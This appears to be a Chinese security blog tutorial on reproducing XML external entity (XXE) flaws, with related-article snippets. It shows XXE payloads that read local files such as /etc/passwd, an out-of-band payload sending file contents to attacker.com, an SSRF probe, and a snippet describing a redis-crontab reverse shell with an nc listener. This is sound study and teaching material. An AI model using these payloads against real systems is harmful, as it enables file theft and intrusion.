xxe漏洞之——漏洞复现

XXE漏洞详解

最新推荐文章于 2025-10-28 17:08:14 发布

原创最新推荐文章于 2025-10-28 17:08:14 发布 · 2.4k 阅读

2 ·

CC 4.0 BY-SA版权

渗透测试(web渗透) 专栏收录该内容

39 篇文章

订阅专栏

漏洞介绍
XXE全称XML External Entity Injection，也就是XML外部实体注入攻击，漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE，就必须懂得XML的一些规则。
XML是用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。
漏洞原理
DTD里声明XML外部实体＜!ENTITY 实体名称 SYSTEM “url”>，url内容为一些敏感的本地文件路径或攻击链接或127.0.0.1:端口(端口扫描)
漏洞复现
Xml数据：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE name [
<!ENTITY aa SYSTEM "file:///C:/Users/Administrator/Desktop/1.txt" >
]>
<name>&aa;</name>

输入后效果：1.txt内容被显示到显示name的值处
在这里插入图片描述
漏洞危害
1.读取任意文件：外部实体内容为本地文件路径
2.URL请求：外部实体内容为指定url
3.Dos拒绝服务：递归调用，占用大量服务器资源

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

bbq,

关注关注

3
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【1day】宏景OA SmsAcceptGSTXServlet接口 XXE漏洞学习——可读取任意文件

记录并分享学习安全的知识点..

09-16

874

宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件，它为企业提供了全面的办公自动化解决方案，包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA SmsAcceptGSTXServlet接口存在xxe漏洞，攻击者可以利用它来获取敏感信息、控制应用程序、破坏内部网络安全等，从而对企业造成严重的损失。

【nday】复现泛微OA e-cology XXE 漏洞——可读取任意文件

记录并分享学习安全的知识点..

07-14

3628

泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点最初针对用户输入的过滤不太完善，导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过，本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限。

1 条评论您还未登录，请先登录后发表或查看评论

漏洞复现之xxe漏洞

千寻的博客

07-30

858

文章目录XXE-基础实验实验目的实验环境实验工具实验内容实验步骤1.访问目标进行注入攻击2.尝试进行登录，并进行抓包3.根据xxe注入漏洞，构造payloa免责声明 XXE-基础实验实验目的练习XXE(XML注入) 实验环境目标机： windows2008 172.16.12.2 目标地址：http://172.16.12.2 实验工具火狐浏览器：是一款非常稳定，非常流行的Internet浏览器 Burp Suite 实验内容 XXE(XML注入) 实验步骤 1.访问目标进行

xxe简单漏洞复现

西部壮仔的博客

05-25

965

xml初识 XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素漏洞复现 php代码: <?php $xml = file_get_contents("php://input"); $data = simplexml_load_string($xml); echo "<pre>"; print_r($data); //注释掉该语句即为无回显的情

Apache Tomcat文件包含漏洞复现(详细教程)

最新发布

2509_93930198的博客

10-28

1072

Tomcat是Apache开源组织开发的用于处理HTTP服务的项目，两者都是免费的，都可以做为独立的Web服务器运行。Apache Tomcat服务器存在文件包含漏洞，攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：webapp 配置文件或源代码等。Apache Tomcat服务器通过Connector连接器组件与客户程序建立连接，Connector表示接收请求并返回响应的端点。即Connector组件负责接收客户的请求，以及把Tomcat服务器的响应结果发送给客户。

xxe漏洞浅谈以及复现

weixin_51692662的博客

10-18

2097

xxe

XXE漏洞及复现

weixin_45643931的博客

08-20

899

XXE漏洞全称XML External Entity Injection即XML外部实体注入漏洞由名字可以知道这是关于XML的漏洞 SQL注入是在注入点处输入SQL恶意语法执行达到自己的目的那么XXE应该也是类似的在可以解析XML的地方（比如一个输入框等处）提交XML的恶意代码来执行 ⅩXE漏洞发生在应用序解析ⅩML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 ...

XXE漏洞复现

m0_57485346的博客

03-15

792

XXE漏洞复现

ssrf漏洞之——漏洞复现

V_vevive的博客

08-25

960

6.发送三条redis命令，即可将弹shell的脚本写入/etc/crontab,之后将shell发送到指定的ip的一个端口，ip可自己更改，之后在192.168.16.131上使用nc监听4444端口，输入nc -lvvp 4444 开启监听。将url编码后的命令放到redis服务器的ip后(http://172.22.0.2:6379/命令)，替换url发送，过一会nc处就会自动弹出一个控制172.22.0.2:6379的shell。将页面请求的url改为指定本地文件路径的url。

XXE(XML外部实体注入)漏洞分析——pikachu靶场复现

qq_45612828的博客

08-02

8390

XXE(XML外部实体注入)漏洞分析——pikachu靶场复现

WEB漏洞——XXE

qq_63594215的博客

04-12

1867

本次文章主要介绍XXE漏洞的原理，利用以及防御的过程，另外还有介绍一点XML的基础知识，详情请见下文。a) xml，eXtensible Markup Language，可扩展标记语言，是一种标记语言，使用简单标记描述数据b) xml是一种非常灵活的语言，没有固定的标签，所有标签都可以自定义c) 通常，xml被用于信息的传递和记录，因此，xml经常被用于充当配置文件如果把HTML和XML进行对比的话，HTML进行对比的话，HTML旨在显示数据信息，而XML旨在用来进行数据的传输和存储。

XXE漏洞靶场复现

weixin_63124284的博客

10-19

1095

XXE也叫XML（可扩展标记语言）外部实体注入，然后我们这里拆开来解释！！！外部实体：通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。注入：在XML数据传输过程中，数据被恶意修改，导致服务器最终执行了修改后的恶意代码。因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。

XXE漏洞复现实操

wutiangui的博客

10-13

1137

(1)XXE漏洞全称XML External Entity Injection，即xmI外部实体注入漏洞， XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害，XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制，从而导致漏洞。如果能够建立连接，那么服务器端的ncat会收到相应的请求信息。

Apache solr xxe漏洞复现（CVE-2017-12629）

whojoe的博客

07-06

2210

Apache solr xxe漏洞复现（CVE-2017-12629）前言环境搭建漏洞复现参考文章前言影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X

Vulnhub--XXE漏洞复现

qq_62169455的博客

08-23

579

下载完后，选择OVF文件，打开方式选择VMware，存储位置看你自己，然后打开靶机需要我们去登录，这里是没有现成的信息可以让我们登录（Vulnhub的靶场就是比较贴近于实战的环境，这里登录进去就可以直接看到flag，所以它不会直接给我们登录信息），于是就需要通过其他一些渗透手段来获取登录信息。

xxe漏洞原理，简单复现及防御

weixin_56513549的博客

04-11

1246

xxe漏洞原理 Web应用的脚本代码没有限制XML引入外部实体，从而导致测试者可以创建一个包含外部实体的XML，使得其中的内容会被服务器端执行当允许引用外部实体时，通过构造恶意内容，就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害 xxe联系靶场 http://web.jarvisoj.com:9882/ 复现步骤打开代理进行抓包操作明显看到使用的是json读取我们将包放进重发模块修改成xml读取方式读取flag包 <?xml versio..

网络安全之XXE漏洞复现及防御(上篇)（技术进阶）

weixin_70911257的博客

04-16

1926

xxe漏洞复现

XXE漏洞靶机复现

C233333235的博客

07-25

628

然后再次回去登录进行抓包（因为管理员登陆页面没有xxe，所以回到第一个登陆页面），然后用如下代码替换xml语句（后来发现不用重新抓包，一直用重放器里的请求包就行）他说flag在这个里面，所以据推测这也是一段编码文字，我们再次拿去解码，试了base64后发现解码失败，我们再试试base32，发现解码成功了.像之前一样再次拿去登陆抓包中，用xml语句进行查询，语句如下（后来发现不用重新抓包，一直用重放器里的请求包就行）但是这仍然不是我们要的路径，再次拿去解码，这次又变成了base64，解码成功。

xxe漏洞复现

07-30

### XXE（XML External Entity）漏洞复现步骤及利用示例 XXE（XML External Entity）漏洞通常出现在应用程序解析 XML 输入时，未正确处理外部实体引用，从而导致潜在的敏感数据泄露、服务器端请求伪造（SSRF）等攻击。以下是复现 XXE 漏洞的典型步骤及利用示例。 #### 1. 漏洞复现环境搭建为了复现 XXE 漏洞，需准备一个能够解析 XML 并支持外部实体的解析器。例如，使用 Python 的 `xml.etree.ElementTree` 或 Java 的 `DocumentBuilderFactory` 等库。搭建一个简单的 Web 应用，接收 XML 输入并解析。 #### 2. 基础 XXE 利用示例最基本的 XXE 攻击是通过定义外部实体读取本地文件。例如： ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root> ``` 当服务端解析该 XML 时，会读取 `/etc/passwd` 文件内容，并可能将其返回给攻击者[^4]。 #### 3. 带外数据（OOB）利用方式在某些情况下，服务器不会直接返回解析结果，此时可以通过带外数据（Out-of-Band）方式将数据发送到攻击者控制的服务器。例如： ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/xxe?data=%file;"> %remote; ]> <root/> ``` 该 payload 会尝试读取 `/etc/passwd` 文件，并将其作为参数发送到攻击者控制的 `http://attacker.com/xxe`，从而实现数据窃取[^4]。 #### 4. XXE 目录遍历攻击通过 XXE 漏洞，还可以尝试列出服务器上的目录内容。虽然实际中受限于文件系统权限，但理论上可以构造如下 payload： ```xml <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///etc/"> <!ENTITY % eval "<!ENTITY % directory SYSTEM 'file:///%file;'>"> %eval; %directory; ]> <test>&directory;</test> ``` 此 payload 会尝试读取 `/etc/` 目录内容，并通过外部实体将其内容外带[^1]。 #### 5. XXE 与 SSRF 结合攻击 XXE 还可用于 SSRF（Server Side Request Forgery）攻击，访问内网资源或远程服务器。例如： ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/internal-api"> ]> <root>&xxe;</root> ``` 此 payload 会向本地 `8080` 端口发起请求，获取内网服务的响应内容[^4]。 #### 6. XXE 修复建议为了防止 XXE 漏洞，建议采取以下措施： - **禁用外部实体解析**：在 XML 解析器中禁用 DTD（Document Type Definitions）和外部实体。 - **使用安全的解析库**：避免使用易受攻击的 XML 解析器，改用 JSON 等更安全的数据格式。 - **输入验证与过滤**：对用户输入进行严格验证，拒绝包含 XML 特殊字符的输入。 - **最小权限原则**：确保运行 XML 解析器的进程使用最小权限账户，防止攻击者读取敏感文件。